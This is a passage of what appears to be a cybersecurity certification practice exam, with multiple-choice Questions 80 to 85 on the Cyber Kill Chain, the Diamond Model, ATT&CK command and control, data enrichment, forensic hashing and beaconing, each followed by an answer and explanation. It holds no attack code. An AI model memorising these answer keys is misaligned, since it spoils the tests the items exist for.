Root cause analysis involves identifying the initial cause or the underlying factors that contributed to an incident. An incident response plan outlines procedures and processes for handling security incidents. It is a preparation tool, not a post-incident activity to identify the underlying cause of an incident. The lessons learned process involves reviewing an incident to identify what was done well and what needs improvement for future responses. It does not primarily focus on identifying the underlying cause of the incident. While forensic analysis involves a meticulous examination of all evidence related to an incident, its primary aim is not to identify the underlying cause.

Question 80

Which phase of the Cyber Kill Chain involves the gathering of information about the target system, its technologies, potential vulnerabilities, and users?

A. Reconnaissance
B. Weaponization
C. Delivery
D. Exploitation

Answer 80

A. Reconnaissance

Reconnaissance is the initial phase of the Cyber Kill Chain that involves gathering information about the target system, its technologies, potential vulnerabilities, and users. Exploitation involves the execution of the delivered exploit, not gathering information about a target system. The weaponization phase involves packaging an exploit into a deliverable payload, not gathering information about a target system. The delivery phase involves transmitting the weaponized bundle to the victim, not gathering information about a target system.

Question 81

In the Diamond Model of Intrusion Analysis, what does the Capability component represent?

A. The physical and virtual resources utilized in the attack.
B. The entity conducting the attack.
C. The entity that is targeted by the attack.
D. The tools and techniques used in the attack.

Answer 81

D. The tools and techniques used in the attack.

The Capability component of the Diamond Model of Intrusion Analysis represents the tools and techniques used in the attack. The entity conducting the attack is represented by the Adversary, not Capability. The entity that is targeted by the attack is represented by the Victim, not Capability. The physical and virtual resources utilized in the attack are represented by Infrastructure, not Capability.

Question 82

An adversary compromises a web server in your network using a zero-day exploit and then uses it as a command and control (C2) server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate?

A. Command and Control
B. Persistence
C. Exploitation
D. Impact

Answer 82

A. Command and Control

In the MITRE ATT&CK framework, Command and Control is a stage that describes how an adversary communicates with systems under their control within a target network. Persistence involves methods an adversary might use to maintain access within a network, but doesn’t represent the use of a C2 server. Exploitation is part of gaining initial access but does not describe the use of compromised systems for command and control. Impact describes the objective of the adversary, often disruptive actions like data destruction or defacement. The use of a C2 server is not an impact action.

Question 83

Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?

A. Data enrichment.
B. Deep learning.
C. Continuous integration.
D. Machine learning.

Answer 83

A. Data enrichment.

When data enrichment occurs, it could combine a threat intelligence feed with a log of NetFlow. This will allow the analyst to know if an IP address of interest is actually associated with a known APT. Machine learning and deep learning are forms of artificial intelligence that may be used to conduct data enrichment activities, but individually they are not sufficient to answer this question. Continuous integration is a software development method in which code updates are tested and committed to development or build server/code repositories rapidly, and is unrelated to this question.

Question 84

Which of the following actions should be done FIRST after forensically imaging a hard drive for evidence in an investigation?

A. Encrypt the source drive to ensure an attacker cannot modify its contents.
B. Encrypt the image file to ensure it maintains data integrity.
C. Create a hash digest of the source drive and the image file to ensure they match.
D. Digitally sign the image file to provide non-repudiation of the collection.

Answer 84

C. Create a hash digest of the source drive and the image file to ensure they match.

The first thing that must be done after acquiring a forensic disk image is to create a hash digest of the source drive and destination image file to ensure they match. A critical step in the presentation of evidence will be to prove that analysis has been performed on an identical image to the data present on the physical media and that neither data set has been tampered with. The standard means of proving this is to create a cryptographic hash or fingerprint of the disk contents and any derivative images made from it. When comparing hash values, you need to use the same algorithm used to create the reference value. While encrypting the image files is a good security practice to maintain the data’s confidentiality, it does not provide data integrity like a hash digest does. Once imaged, the source drive should not be altered or encrypted. Digitally signing the image file could serve the function of non-repudiation, but it is an uncommon practice and not required to be performed.

Question 85

A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization’s proxy firewall is properly configured to successfully drop the messages before leaving the network. Which of the following is MOST likely the cause of the call home messages being sent?

A. An attacker is performing reconnaissance on the organization’s workstations.
B. A malicious insider is trying to exfiltrate information to a remote network.
C. Malware is running on a company workstation or server.
D. An infected workstation is attempting to reach a command and control server.

Answer 85

D. An infected workstation is attempting to reach a command and control server.

A call home message is an indicator of compromise known as beaconing. Beaconing usually occurs after a stage 1 malware program has been implanted on an organization’s workstation or server, but that isn’t the most correct answer to this question. Instead, beaconing indicates that a workstation or server is infected and tries to communicate with the attacker’s command and control server. This beaconing will continue until the infected system (workstation or server) is found and cleared of the malware or until the botnet gives the infected host further instructions to perform (such as to attack). “Malware is running on a company workstation or server” is incorrect because we do not have positive verification of that based on this scenario. A beacon does not have to be malware. For example, it can simply be a single ping packet or DNS request being sent out every day at a certain time using the Windows task scheduler. Be careful on the exam to answer the question being asked and choose the “most” accurate answer. Since the call home signal is coming from the internal network and attempting to connect to an external server, it cannot be evidence of an attacker performing reconnaissance on your workstations. Also, nothing in the question is indicative of an insider threat trying to exfiltrate information since a call home message is generally minimal in size and not large enough to exfiltrate data.